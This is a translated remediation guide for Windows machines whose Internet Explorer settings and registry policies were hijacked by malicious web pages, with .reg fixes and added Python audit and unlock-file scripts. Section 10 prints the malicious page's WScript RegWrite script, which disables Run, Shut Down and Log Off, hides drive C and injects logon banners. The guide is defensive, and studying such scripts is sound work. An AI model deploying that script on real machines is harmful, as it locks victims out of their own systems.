Solution to hit by a malicious website-6 to use the registry

Source: Internet
Author: User



1. Reasons for Registry Modification and Solutions

A malicious web page is a web page file that carries harmful code (typically ActiveX or script). The advertising it shows up afterwards because the browser's registry settings have been maliciously changed.

1. The default Internet Explorer home page is modified.

The title bar at the top of the IE browser is changed to "Welcome to visit ...". The registry entries that are modified are:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
Changing the data of the "Start Page" value changes IE's default home page.
① After Windows has started, click "Start" → "Run", type Regedit in the "Open" box and press "OK";
② Expand the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main,
find the string value "Start Page" in the right-hand pane and change its data to "about:blank";
③ Similarly, expand the registry key
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,
find the string value "Start Page" in the right-hand pane and treat it as described in step ②.
④ Exit the Registry Editor and restart the computer. Everything is back to normal.
Special case: with some websites the IE start page reverts to their site after every restart even though you have changed it in the Internet Options, which is very hard to get rid of. They have actually added a self-starting program to your machine, and it sets the IE start page to their website each time the system starts.
Solution: run the registry editor regedit.exe and expand
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, delete the registry.exe entry there, then delete the self-starting program C:\Program Files\registry.exe itself, and finally reset the start page from the IE options.

2. IE's default page is tampered with

On some machines the IE start page has been changed, and even choosing "Use Default" has no effect, because the default page behind the start page has been tampered with as well. The registry entry modified is:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL
The data of the value "Default_Page_URL" is the page used as the default start page.
Solution:
Remove the tampering website's URL from the "Default_Page_URL" value.

3. The default IE home page is modified and the setting is locked so the user cannot change it back.

The following values IE uses in the registry are modified (the restriction is in effect when the DWORD value is 1):
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Settings"=dword:00000001
"Links"=dword:00000001
"SecAddSites"=dword:00000001
Solution: change the above DWORD values to "0" to restore the functions.

4. IE's default home page button is greyed out and cannot be selected.

The DWORD value "HomePage" under HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel has been modified. Its original data is "0" and it has been changed to "1" (that is, greyed out and not selectable).
Solution: change the "HomePage" value back to "0".

5. The IE title bar is modified.

By default the text of the title bar is supplied by the application itself, but extra information can be added to it through the registry, and some malicious websites exploit this: they set the data of the string value "Window Title" to their website name or further advertising, thereby changing the title bar of the IE browser.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
Solution:
① After Windows has started, click the "Start" → "Run" menu item, type Regedit in the "Open" box and press "OK";
② Expand the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main, find the string value "Window Title" in the right-hand pane and delete it, or change its data to "IE browser" or any name you like;
③ Similarly, expand the registry key
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main and handle it as described in step ②.
④ Exit the Registry Editor, restart the computer and run IE.

6. The IE shortcut (right-click) menu is modified.

The registry key modified is:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt: a new entry carrying advertising for a web page appears in IE's right-click menu!
Solution: open the Registry Editor, find
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt and delete the advertising entries. Be careful not to delete the entries for the download tools FlashGet and NetAnts, which are legitimate.

7. IE's default search engine is modified

The IE toolbar has a search button for searching the web. After tampering, clicking that search button takes you to the tampered-with website. The cause is modification of the following registry entries:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant
Solution:
Run the Registry Editor, expand the subkeys above and change the data of "CustomizeSearch" and "SearchAssistant" to the URL of a search engine.

8. A dialog box is displayed when the system starts.

The modified registry key is:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon, under which the string values "LegalNoticeCaption" and "LegalNoticeText" have been created. "LegalNoticeCaption" is the title of the prompt box and "LegalNoticeText" is its text. As long as they exist, a prompt window showing those web pages' advertising appears every time we log on to the Windows desktop.
Solution: open the Registry Editor and find the
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon key. Find the "LegalNoticeCaption" and "LegalNoticeText" strings in the right-hand pane and delete them.

9. The Registry Editor is disabled after browsing a web page

This happens because the DWORD value "DisableRegistryTools" under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System has been changed to "1"; restoring the value to "0" lifts the restriction.
Solution: since regedit itself is blocked, use Notepad to create a file with the extension .reg containing the following, and double-click it to import it:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
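The checks in sections 1 to 9 (and the policy values listed under sections 10 and 12 below) can be collected into one audit script. The following Python is an added example and not part of the original article: the value names are the ones the article lists, the expected clean states follow its advice (home page "about:blank", no window title or logon banner, all policy flags 0, no Run entry for registry.exe), and SAMPLE_SNAPSHOT is a constructed registry snapshot standing in for a hijacked machine. On Windows, snapshot_from_registry() reads the live values through the standard winreg module; elsewhere only the comparison logic runs.

```python
"""Audit the registry locations the article names for signs of a browser hijack.

Added example: value names and clean states follow the article; SAMPLE_SNAPSHOT
is constructed data, not a real machine.
"""
HKCU, HKLM, HKU = "HKEY_CURRENT_USER", "HKEY_LOCAL_MACHINE", "HKEY_USERS"

IE_MAIN = r"Software\Microsoft\Internet Explorer\Main"
IE_SEARCH = r"Software\Microsoft\Internet Explorer\Search"
IE_CP = r"Software\Policies\Microsoft\Internet Explorer\Control Panel"
IE_RESTR = r"Software\Policies\Microsoft\Internet Explorer\Restrictions"
POL_EXPLORER = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
POL_SYSTEM = r"Software\Microsoft\Windows\CurrentVersion\Policies\System"
POL_WINOLD = r"Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp"
WINLOGON = r"Software\Microsoft\Windows\CurrentVersion\Winlogon"
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# (hive, subkey, value name, rule).  Rules:
#   "home"   -> anything other than about:blank (the article's recommended setting) is reported
#   "empty"  -> any non-empty string is an injected window title or logon banner
#   "report" -> the search URLs are always listed so the operator can confirm them
#   "flag"   -> a non-zero value means a lock-out policy from sections 3, 4, 9, 10 or 12 is active
CHECKS = [
    (HKCU, IE_MAIN, "Start Page", "home"),
    (HKLM, IE_MAIN, "Start Page", "home"),
    (HKLM, IE_MAIN, "Default_Page_URL", "home"),
    (HKCU, IE_MAIN, "Window Title", "empty"),
    (HKLM, IE_MAIN, "Window Title", "empty"),
    (HKLM, IE_SEARCH, "CustomizeSearch", "report"),
    (HKLM, IE_SEARCH, "SearchAssistant", "report"),
    (HKLM, WINLOGON, "LegalNoticeCaption", "empty"),
    (HKLM, WINLOGON, "LegalNoticeText", "empty"),
    (HKU, ".DEFAULT\\" + IE_CP, "HomePage", "flag"),
    (HKCU, POL_SYSTEM, "DisableRegistryTools", "flag"),
]
CHECKS += [(HKCU, IE_CP, n, "flag") for n in ("Settings", "Links", "SecAddSites")]
CHECKS += [(h, k, n, "flag") for h, k in ((HKCU, IE_RESTR), (HKU, ".DEFAULT\\" + IE_RESTR))
           for n in ("NoViewSource", "NoBrowserContextMenu")]
CHECKS += [(HKCU, POL_EXPLORER, n, "flag")
           for n in ("NoRun", "NoClose", "NoLogoff", "NoDrives", "RestrictRun")]
CHECKS += [(HKCU, POL_WINOLD, n, "flag") for n in ("Disabled", "NoRealMode")]


def _nonzero(data):
    """True for a non-zero DWORD, a REG_BINARY blob with any set byte, or a numeric
    string; the script in section 10 writes NoRun and friends as REG_BINARY 01."""
    if isinstance(data, (bytes, bytearray)):
        return any(data)
    if isinstance(data, int):
        return data != 0
    try:
        return int(str(data), 16) != 0
    except ValueError:
        return False


def audit(snapshot):
    """snapshot: {(hive, subkey): {value name: data}}. Returns (key, name, data, reason) tuples."""
    findings = []
    for hive, subkey, name, rule in CHECKS:
        data = snapshot.get((hive, subkey), {}).get(name)
        key = hive + "\\" + subkey
        if data is None:
            continue                      # value not present: nothing to reset
        if rule == "home" and str(data).strip().lower() != "about:blank":
            findings.append((key, name, data, "home page not about:blank"))
        elif rule == "empty" and str(data).strip():
            findings.append((key, name, data, "injected text"))
        elif rule == "report":
            findings.append((key, name, data, "confirm search URL"))
        elif rule == "flag" and _nonzero(data):
            findings.append((key, name, data, "lock-out policy set"))
    # Section 1: a Run entry that re-applies the hijack at every boot.
    for name, cmd in snapshot.get((HKLM, RUN_KEY), {}).items():
        if "registry.exe" in str(cmd).lower():
            findings.append((HKLM + "\\" + RUN_KEY, name, cmd, "autorun re-applies hijack"))
    return findings


def snapshot_from_registry():
    """Read the checked keys on a live Windows host through the standard winreg module."""
    import winreg                         # Windows-only, so imported lazily
    roots = {HKCU: winreg.HKEY_CURRENT_USER, HKLM: winreg.HKEY_LOCAL_MACHINE, HKU: winreg.HKEY_USERS}
    snapshot = {}
    for hive, subkey in {(h, k) for h, k, _, _ in CHECKS} | {(HKLM, RUN_KEY)}:
        try:
            with winreg.OpenKey(roots[hive], subkey) as handle:
                values, index = {}, 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(handle, index)
                    except OSError:
                        break             # no more values under this key
                    values[name] = data
                    index += 1
                snapshot[(hive, subkey)] = values
        except OSError:
            pass                          # key absent: nothing is set there
    return snapshot


# Constructed snapshot of a machine hit by the script in section 10 (not real data).
SAMPLE_SNAPSHOT = {
    (HKCU, IE_MAIN): {"Start Page": "http://hijacked.example/", "Window Title": "Oh la ..."},
    (HKLM, IE_MAIN): {"Start Page": "about:blank"},
    (HKLM, WINLOGON): {"LegalNoticeCaption": "Oh la ...", "LegalNoticeText": ""},
    (HKCU, POL_EXPLORER): {"NoRun": b"\x01", "NoDrives": 4, "NoLogoff": b"\x00"},
    (HKCU, POL_SYSTEM): {"DisableRegistryTools": 1},
    (HKLM, RUN_KEY): {"registry": r"C:\Program Files\registry.exe", "ctfmon": "ctfmon.exe"},
}

if __name__ == "__main__":
    import sys
    snap = snapshot_from_registry() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for key, name, data, reason in audit(snap):
        print("%-28s %s\\%s = %r" % (reason + ":", key, name, data))
```

Run on the constructed snapshot it reports seven findings: the hijacked start page, the injected window title and logon caption, the NoRun and NoDrives lock-outs, the disabled registry tools and the registry.exe autorun; NoLogoff is not reported because its binary data is zero. Values the article says to inspect rather than reset (the search URLs) are always listed so the operator can decide.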

10. The Start menu is modified after browsing a web page.

1) "Shut Down" is disabled
2) "Run" is disabled
3) "Log Off" is disabled
4) Drive C is hidden (your drive C can no longer be found!)
5) The Registry Editor (Regedit) is disabled
6) DOS programs are disabled
7) The system can no longer enter "real mode"
8) Running any program is prohibited

Note: the following is the script the malicious web page uses to modify the victim's registry. SHL, FSO and net are the WScript.Shell, FileSystemObject and WScript.Network objects the page's script has already created; the code is shown as the page gives it, with the page's notes turned into comments.

// Removes the "Run" item, so the user cannot open the Registry Editor to undo the page's changes.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
// Removes the "Shut Down" item.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
// Removes the "Log Off" item.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogoff", 01, "REG_BINARY");
// Hides logical drive C.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
// Disables all DOS applications.
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", 01, "REG_BINARY");
// Prevents the system from starting in "real mode" (traditional DOS mode).
SHL.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", 01, "REG_BINARY");
// The page also modifies the following two values so that a notice window appears during Windows logon
// (before the Microsoft network logon): the caption becomes "Oh la ..." and the second line supplies the body text.
SHL.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "...");
SHL.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "...");
// The next two lines give every IE window of the victim the title "Oh la ...".
SHL.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "...");
SHL.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "...");
// All modifications to the victim's registry are complete at this point.
// The following code adds a web page to the victim's Favorites.
var WF, Shor, Loc;
WF = FSO.GetSpecialFolder(0);          // the Windows folder
Loc = WF + "\\Favorites";
if (!FSO.FolderExists(Loc))
{
    Loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + net.UserName + "\\Favorites";
    if (!FSO.FolderExists(Loc))
    {
        return;                        // no Favorites folder found, so give up
    }
}
// AddFavLnk is the page's helper (its body is not shown) that writes the shortcut into the Favorites folder.
AddFavLnk(Loc, "Find feeling www.findfeel.com", "http://www.findfeel.com");

Solution for affected users:
1: Win9x users should press F8 when the computer starts, choose MS-DOS mode and run the command scanreg /restore to restore an earlier, normal backup of the registry.
2: Win2000 users should copy the following content, save it as the file unlock.reg, import it with the command regedit unlock.reg (optionally from Safe Mode with Command Prompt) and restart the machine.
The content of the unlock.reg file is as follows:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogoff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000000
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE browser"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE browser"

11. The shortcut menu in IE no longer works.

After browsing the web page, right-clicking in IE has no effect at all. The value responsible is the same "NoBrowserContextMenu" described under section 12, and the fix given there restores the menu.

12. The "View Source" menu item is disabled

In the IE window, click "View" → "Source": the "Source" menu item is disabled. Specifically, a subkey "Restrictions" has been created under
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer, and two DWORD values, "NoViewSource" and "NoBrowserContextMenu", have been created under "Restrictions" and set to "1".
Likewise, under
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions, the values "NoViewSource" and "NoBrowserContextMenu" have been changed to "1".
Solution:
Save the following content as a registry file with the extension .reg, for example unlock.reg. Double-click unlock.reg to import it into the registry, then run IE again.
REGEDIT4

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000

Note that in this unlock.reg file "REGEDIT4" must be in capitals and must be followed by a blank line, and there must be no space between the "4" and the "T" in "REGEDIT4"; otherwise the import fails. Note: Win2000 and WinXP users should replace "REGEDIT4" with "Windows Registry Editor Version 5.00".
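Sections 9, 10 and 12 each hand-write an unlock.reg, and the header rule in the note above is the part that most often goes wrong. The Python below is an added example, not code from the article: it generates such a file from a list of resets (the article's values from sections 9, 10 and 12, plus NoClose, which the script in section 10 sets but the article's unlock.reg does not reset) and checks the header rule the note describes. The entry list, its grouping and the "Window Title" deletions (section 5 allows either deleting or renaming) are this example's own choices.

```python
"""Generate and sanity-check a .reg remediation file like the article's unlock.reg.

Added example, not from the article. UNLOCK_ENTRIES are the resets the article
prescribes in sections 9, 10 and 12, plus NoClose, which its script sets but its
unlock.reg leaves out.
"""
HEADERS = {4: "REGEDIT4", 5: "Windows Registry Editor Version 5.00"}

POL = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies"
IE_MAIN_HKLM = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main"
IE_MAIN_HKCU = r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main"
IE_RESTR = r"Software\Policies\Microsoft\Internet Explorer\Restrictions"
WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon"

# (key, value name, kind, data); kind is "dword", "sz", "hex" or "delete".
UNLOCK_ENTRIES = (
    [(POL + r"\Explorer", n, "dword", 0)
     for n in ("NoRun", "NoClose", "NoLogoff", "NoDrives", "RestrictRun")]
    + [(POL + r"\System", "DisableRegistryTools", "dword", 0)]
    + [(POL + r"\WinOldApp", n, "dword", 0) for n in ("Disabled", "NoRealMode")]
    + [(WINLOGON, n, "sz", "") for n in ("LegalNoticeCaption", "LegalNoticeText")]
    + [(IE_MAIN_HKLM, "Window Title", "delete", None),
       (IE_MAIN_HKCU, "Window Title", "delete", None),
       (IE_MAIN_HKCU, "Start Page", "sz", "about:blank")]
    + [(h + "\\" + IE_RESTR, n, "dword", 0)
       for h in ("HKEY_CURRENT_USER", r"HKEY_USERS\.DEFAULT")
       for n in ("NoViewSource", "NoBrowserContextMenu")]
)


def encode_value(kind, data):
    """Encode one value's data in .reg syntax."""
    if kind == "dword":
        return "dword:%08x" % data                    # eight hex digits, as in dword:00000000
    if kind == "sz":                                   # backslashes and quotes are escaped in REG_SZ data
        return '"%s"' % str(data).replace("\\", "\\\\").replace('"', '\\"')
    if kind == "hex":
        return "hex:" + ",".join("%02x" % b for b in data)
    if kind == "delete":
        return "-"                                     # "name"=- deletes the value on import
    raise ValueError("unknown kind %r" % kind)


def build_reg(entries, version=5):
    """Group entries by key and emit the file text: header first, blank line second."""
    lines = [HEADERS[version], ""]
    grouped = {}
    for key, name, kind, data in entries:
        grouped.setdefault(key, []).append('"%s"=%s' % (name, encode_value(kind, data)))
    for key, values in grouped.items():
        lines.append("[%s]" % key)
        lines.extend(values)
        lines.append("")
    return "\r\n".join(lines)


def validate_reg(text):
    """Apply the article's rule: the header must match exactly (case and spacing),
    a blank line must follow, and the rest must be [key] or "name"=... lines.
    Returns (ok, message)."""
    lines = text.splitlines()
    if not lines or lines[0] not in HEADERS.values():
        return False, "header must be exactly REGEDIT4 or Windows Registry Editor Version 5.00"
    if len(lines) < 2 or lines[1].strip():
        return False, "header must be followed by a blank line"
    for number, line in enumerate(lines[2:], start=3):
        if not line.strip():
            continue
        if line.startswith("[") and line.endswith("]"):
            continue
        if (line.startswith('"') and "=" in line) or line.startswith("@="):
            continue
        return False, "line %d is neither a key nor a value" % number
    return True, "ok"


if __name__ == "__main__":
    text = build_reg(UNLOCK_ENTRIES)
    print(text)
    print(validate_reg(text))
    with open("unlock.reg", "w", newline="") as handle:   # then: regedit unlock.reg
        handle.write(text)
```

build_reg(UNLOCK_ENTRIES, version=4) emits the REGEDIT4 form the note prescribes for Win9x; validate_reg rejects a lower-case "regedit4", a "REGEDIT 4" with a stray space, and a file whose header is not followed by a blank line, which are exactly the mistakes the note warns about.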
(Source: Hotspot Network)
